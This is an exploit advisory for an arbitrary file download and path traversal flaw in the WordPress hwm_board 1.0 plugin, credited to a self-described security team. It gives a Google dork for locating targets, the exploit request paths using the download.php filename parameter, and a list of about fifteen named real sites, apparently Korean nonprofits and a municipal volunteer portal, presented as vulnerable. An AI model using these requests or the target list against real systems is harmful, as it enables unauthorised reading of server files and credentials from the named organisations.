WordPress hwm_board 1.0 Arbitrary File Disclosure

`#################################################################################################  
  
# Exploit Title : WordPress hwm_board 1.0 Plugins Korea Arbitrary File  
Download Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 28/11/2018  
# Vendor Homepage : wordpress.org  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : All Current Versions - 1.0  
# Google Dorks : inurl:''/wp-content/plugins/hwm_board/'' site:kr  
# Exploit Risk : Medium  
# Vulnerability Type :  
CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-200 - [ Information Exposure ] - CWE-23 - [ Relative Path Traversal ]  
CWE-98 - [ Improper Control of Filename for Include/Require Statement in  
PHP Program ('PHP Remote File Inclusion') ]  
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110234  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]  
  
/wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
TARGETDOMAIN/wp-content/plugins/hwm_board/download.php?filename=  
TARGETDOMAIN/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] xn--2e0b78hl7j9vm9rp.xn--3e0b707e/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] xn--2e0b050bole3xb963a.xn--3e0b707e/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] kodw.or.kr/wp-content/plugins/hwm_board/  
download.php?filename=  
kodw.or.kr/wp-content/uploads/hwm-board/  
[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] bhchild.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] volunteer.seongnam.go.kr/wp-content/plugins/hwm-board/  
download.php?filename=[FILENAMEHERE]  
  
[+] vol.or.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] bhchild.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]  
  
[+] snse.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]  
  
[+] kadpi.or.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] ddui.org/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] snjwyouth.or.kr/wp-content/plugins/hwm_board/  
download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] jungangbokji.or.kr/wp-content/plugins/hwm_board/  
download.php?filename=jungangbokji.or.kr/wp-content/uploads/hwm-board/  
[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
[+] sntp4.or.kr/wp-content/plugins/hwm_board/download.php?filename=  
sntp4.or.kr/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`